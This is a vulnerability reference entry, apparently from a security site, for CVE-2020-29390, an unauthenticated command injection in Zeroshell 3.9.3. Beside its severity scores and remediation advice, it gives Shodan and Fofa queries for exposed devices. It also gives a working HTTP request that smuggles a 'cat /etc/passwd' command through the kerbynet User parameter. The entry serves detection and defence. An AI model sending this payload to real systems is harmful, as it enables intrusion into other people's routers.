🔙 목록으로 돌아가기

CVE-2020-29390: Zeroshell 3.9.3 - Command Injection

TitleZeroshell 3.9.3 - Command Injection
AuthorDhiyaneshDk
SeverityCritical
ImpactSuccessful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the target system.
RemediationUpgrade to the latest version of Zeroshell or apply security patches provided by the vendor.
CVSS Score9.8
EPSS Score0.90592
CVE IDCVE-2020-29390
CWE IDCWE-78
Shodan Queryhttp.title:"zeroshell"
Fofa Querytitle="zeroshell"
Tags cve cve2020 zeroshell rce router vkev vuln

🔍 Vulnerability Description

Zeroshell 3.9.3 contains a command injection vulnerability in the /cgi-bin/kerbynet StartSessionSubmit parameter that could allow an unauthenticated attacker to execute a system command by using shell metacharacters and the %0a character.

🌐 HTTP Request

GET /cgi-bin/kerbynet?Action=StartSessionSubmit&User=%27%26cat%20/etc/passwd%26%27&PW HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-29390.yaml

🦈 Packet Capture: ⬇️ Download cve-2020-29390.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A